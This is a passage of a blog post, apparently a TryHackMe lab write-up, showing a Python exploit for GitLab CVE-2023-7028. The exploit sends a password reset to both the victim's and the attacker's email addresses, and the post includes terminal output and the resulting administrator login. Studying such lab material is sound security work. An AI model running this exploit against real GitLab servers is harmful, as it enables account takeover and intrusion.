#E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Accept&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Content-Type&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;application\/x-www-form-urlencoded&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Referer&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">\/users\/password\/new&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Connection&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;close&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Accept-Language&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;en-US,en;q=0.5&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Accept-Encoding&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;gzip, deflate, br&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        }<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Sending reset password request&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        html <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.s.post(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">\/users\/password&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                           <\/span><span style=\"color: #FD971F; font-style: italic\">data<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">query_string,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                           <\/span><span style=\"color: #FD971F; font-style: italic\">headers<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">head,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                           <\/span><span style=\"color: #FD971F; font-style: italic\">verify<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">).text<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        sended <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;If your email address exists in our database&#39;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">in<\/span><span style=\"color: #F8F8F2\"> html<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> sended:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Emails sent to <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.target<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\"> and <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.evil<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\"> !&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;Flag value: <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #66D9EF; font-style: italic\">bytes<\/span><span style=\"color: #F8F8F2\">.fromhex(<\/span><span style=\"color: #E6DB74\">&quot;6163636f756e745f6861636b2364&quot;<\/span><span style=\"color: #F8F8F2\">).decode()<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">else<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Failed ... quitting&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> sended<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">parse_args<\/span><span style=\"color: #F8F8F2\">():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> argparse.ArgumentParser(<\/span><span style=\"color: #FD971F; font-style: italic\">add_help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">description<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;This tool automates CVE-2023-7028 on gitlab&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-u&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--url&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;url&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Gitlab url&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-t&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--target&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;target&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Target email&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-e&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--evil&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;evil&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">default<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">None<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Evil email&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-p&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--password&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;password&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">default<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">None<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Password&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> parser.parse_args()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> __name__ <\/span><span style=\"color: #F92672\">==<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;__main__&#39;<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    args <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> parse_args()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    exploit <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> CVE_2023_7028(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F; font-style: italic\">url<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">args.url,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F; font-style: italic\">target<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">args.target,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">\t\t<\/span><span style=\"color: #FD971F; font-style: italic\">evil<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">args.evil<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    )<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">not<\/span><span style=\"color: #F8F8F2\"> exploit.ask_reset():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #66D9EF\">exit<\/span><span style=\"color: #F8F8F2\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The code first makes a&nbsp;<code>POST<\/code>&nbsp;request to the&nbsp;<code>\/users\/password\/new<\/code>&nbsp;endpoint to scrap an authenticity token, then it makes another API call to the&nbsp;<code>\/users\/password<\/code>&nbsp;endpoint with the victim and attacker&#8217;s email addresses. As we know, the victim&#8217;s email address is&nbsp;<strong>victim@mail.gitlab.thm<\/strong>.&nbsp;Run the command shown in the terminal below to execute the exploit:<\/p>\n\n\n\n<p>Before running the exploit, let&#8217;s log into the GitLab instance with the credentials provided at <em><strong>http:\/\/10.10.26.184:8090\/rainloop<\/strong><\/em>.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a0393eaa0406&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a0393eaa0406\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"448\" data-attachment-id=\"416\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-1-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?fit=1414%2C619&amp;ssl=1\" data-orig-size=\"1414,619\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?fit=1024%2C448&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1024%2C448&#038;ssl=1\" alt=\"\" class=\"wp-image-416\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1024%2C448&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=300%2C131&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=768%2C336&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?w=1414&amp;ssl=1 1414w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<p>Now, we can run the exploit by executing the following command:<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/GitLab-CVE]\n\u2514\u2500$ python3 attack.py -u http:\/\/10.10.26.184:8000 -t victim@mail.gitlab.thm -e attacker@mail.gitlab.thm\n[DEBUG] Getting authenticity_token ...\n[DEBUG] authenticity_token = q8qAOV1wK3jL52tn0IoJ-2gCCknjh96Fc-iA8TUsQwr-C1rzL22U1lZYas5IswPrFA_SgKzC0FF44mWoWevBHg\n[DEBUG] Sending reset password request\n[DEBUG] Emails sent to victim@mail.gitlab.thm and attacker@mail.gitlab.thm !\nFlag value: account_hack#d\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/GitLab-CVE<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">attack.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.26.184:8000<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-t<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">victim@mail.gitlab.thm<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-e<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">attacker@mail.gitlab.thm<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Getting authenticity_token ...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> authenticity_token = q8qAOV1wK3jL52tn0IoJ-2gCCknjh96Fc-iA8TUsQwr-C1rzL22U1lZYas5IswPrFA_SgKzC0FF44mWoWevBHg<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Sending reset password request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Emails sent to victim@mail.gitlab.thm and attacker@mail.gitlab.thm <\/span><span style=\"color: #89DDFF\">!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Flag<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">value:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">account_hack#d<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We will get an email with the link to reset the password.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"331\" data-attachment-id=\"417\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-2-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?fit=1521%2C491&amp;ssl=1\" data-orig-size=\"1521,491\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?fit=1024%2C331&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=1024%2C331&#038;ssl=1\" alt=\"\" class=\"wp-image-417\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=1024%2C331&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=300%2C97&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=768%2C248&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?w=1521&amp;ssl=1 1521w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can now access the link to reset the password for user <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">victim@mail.gitlab.thm<\/mark>.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"499\" data-attachment-id=\"418\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-3-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?fit=1426%2C695&amp;ssl=1\" data-orig-size=\"1426,695\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?fit=1024%2C499&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=1024%2C499&#038;ssl=1\" alt=\"\" class=\"wp-image-418\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=1024%2C499&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=300%2C146&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=768%2C374&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?w=1426&amp;ssl=1 1426w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Logging with the new credentials, we see that we are logged in as Administrator!<\/p>\n\n\n\n<div style=\"height:21px\" 